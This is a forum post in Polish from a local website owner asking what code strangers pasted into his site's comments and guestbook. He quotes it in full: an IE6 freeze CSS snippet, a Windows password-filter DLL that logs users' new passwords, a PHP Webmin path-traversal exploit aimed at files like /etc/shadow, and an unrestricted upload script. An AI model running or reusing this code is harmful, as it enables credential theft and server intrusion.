Witam (IMG:
http://forum.php.pl/style_emoticons/default/exclamation.gif) !
Robie strone konkurencyjna dla mojego miasta i jest pare osob zainteresowanych nia!
Ktos proboje cos zrobic, zostaja wklejane kody php na moja strone!!
Oto jeden kod wklejony w systemie newsow w komentarzach:
<!--
# Internet Explorer <= 6 DoS vulnerability
#
# tested IE6 on XPx64 and IE 5.1, 5.5 and 6 on XP SP2 (eng)
# all versions are vulnerable
# ie 7 (beta 2 and 3) are not affected
#
# this malicious css code freezes/ dos the internet explorer
# prior version 7 and stops any user interaction
# the absolute size of the div element does not matter but has
# to be higher than the input's one
#
# 07/14/2006 by jonasschaub at gmail.com
# <a href="http://jonas.elunic.de/blog/index.php/2006/07/14/ie-freeze-bug/" target="_blank">http://jonas.elunic.de/blog/index.php/2006.../ie-freeze-bug/</a>
#
-->
<style type="text/css">
input
{
width:35px;
float:left;
}
</style>
<div style="width:50px;">
<span>
<span style="position:relative;">
<input />
</span>
<input />
<input />
</span>
</div>
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
struct UNI_STRING {
USHORT len;
USHORT maxlen;
WCHAR *buff;
};
static HANDLE fh;
BOOLEAN __stdcall InitializeChangeNotify ()
{
DWORD wrote;
fh = CreateFile("C:temppwdchange.out",
GENERIC_WRITE,
FILE_SHARE_READ|FILE_SHARE_WRITE,
0,
CREATE_ALWAYS,
FILE_ATTRIBUTE_NORMAL|FILE_FLAG_WRITE_THROUG
H,
0);
WriteFile(fh, "InitializeChangeNotify startedn", 31, &wrote, 0);
return TRUE;
}
LONG __stdcall PasswordChangeNotify (
struct UNI_STRING *user,
ULONG rid,
struct UNI_STRING *passwd
)
{
DWORD wrote;
WCHAR wbuf[200];
char buf[512];
char buf1[200];
DWORD len;
memcpy(wbuf, user->buff, user->len);
len = user->len/sizeof(WCHAR);
wbuf[len] = 0;
wcstombs(buf1, wbuf, 199);
sprintf(buf, "User = %s : ", buf1);
WriteFile(fh, buf, strlen(buf), &wrote, 0);
memcpy(wbuf, passwd->buff, passwd->len);
len = passwd->len/sizeof(WCHAR);
wbuf[len] = 0;
wcstombs(buf1, wbuf, 199);
sprintf(buf, "Password = %s : ", buf1);
WriteFile(fh, buf, strlen(buf), &wrote, 0);
sprintf(buf, "RID = %xn", rid);
WriteFile(fh, buf, strlen(buf), &wrote, 0);
return 0L;
}
-----------------------end of
FPNWCLNT.c----------------------------------
--
<?php
/*
Name : Webmin / Usermin Arbitrary File Disclosure Vulnerability
Date : 2006-06-30
Patch : update to version 1.290
Advisory : <a href="http://securitydot.net/vuln/exploits/vulnerabilities/articles/17885/vuln.html" target="_blank">http://securitydot.net/vuln/exploits/vulne...17885/vuln.html</a>
Coded by joffer , <a href="http://securitydot.net" target="_blank">http://securitydot.net</a>
*/
$host = $argv[1];
$port = $argv[2];
$http = $argv[3];
$file = $argv[4];
// CHECKING THE INPUT
if($host != "" && $port != "" && $http != "" && $file != "") {
$z = "/..%01";
for ($i=0;$i<60;$i++) {
$z.="/..%01";
}
$target = $http."://".$host.":".$port."/unauthenticated".$z."/".$file."";
echo "Attacking ".$host."n"; echo "---------------------------------n";
// INITIALIZING CURL SESSION TO THE TARGET
$ch = curl_init();
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_URL, $target);
curl_setopt ($ch, CURLOPT_TIMEOUT, '10');
curl_setopt($ch,CURLOPT_SSL_VERIFYPEER,FALSE
);
$content = curl_exec($ch);
curl_close ($ch);
// CLOSING CURL
// ECHOING THE CONTENT OF THE $FILE
echo "---------------------------------n"; echo "Coded by joffer , <a href="http
://securitydot.netn";;" target="_blank">http://securitydot.netn";;</a>
} else {
// IF INPUT IS NOT CORRECT DISPLAY THE README
echo "Usage php webmin.php HOST PORT HTTP/HTTPS FILEn"; echo "Example : php webmin.php localhost 10000 http /etc/shadown"; echo "Coded by joffer , <a href="http
://securitydot.netn";;" target="_blank">http://securitydot.netn";;</a> }
?>
<?php
$file = $HTTP_POST_FILES["plik"]["tmp_name"];
$zapisz_jako = $HTTP_POST_FILES["plik"]["name"];
if (!copy($file, $zapisz_jako)) {
print ("Kopiowanie pliku nie powiodło się...<br>n");
}
print "<BR>Nazwa pliku: ".$HTTP_POST_FILES["plik"]["name"];
print "<BR>Rozmiar pliku: ".$HTTP_POST_FILES["plik"]["size"];
print "<BR>tymczasowo: ".$HTTP_POST_FILES["plik"]["tmp_name"];
print "<BR>Typ przesłanego pliku: ".$HTTP_POST_FILES["plik"]["type"];
?>
Moaj strona:
http://www.miasto-glubczyce.info/index.php...t=&oms=newsGłowna:
http://www.miasto-glubczyce.info/http://www.miasto-glubczyce.info/?oms=ksiega_gosciW ksiedze tez wpisano jakis kod, dlatego jest error.
HELP (IMG:
http://forum.php.pl/style_emoticons/default/biggrin.gif)
Co te skrypty znacza? Nie znam php, mam 3 rozne IP z ktorych zostaly wysylane kody, nie wiem czy jest to cos powaznego i czy zawiadamiac odpowiednich ludzi...
Dzieku z gory za analize.
Pozdrawiam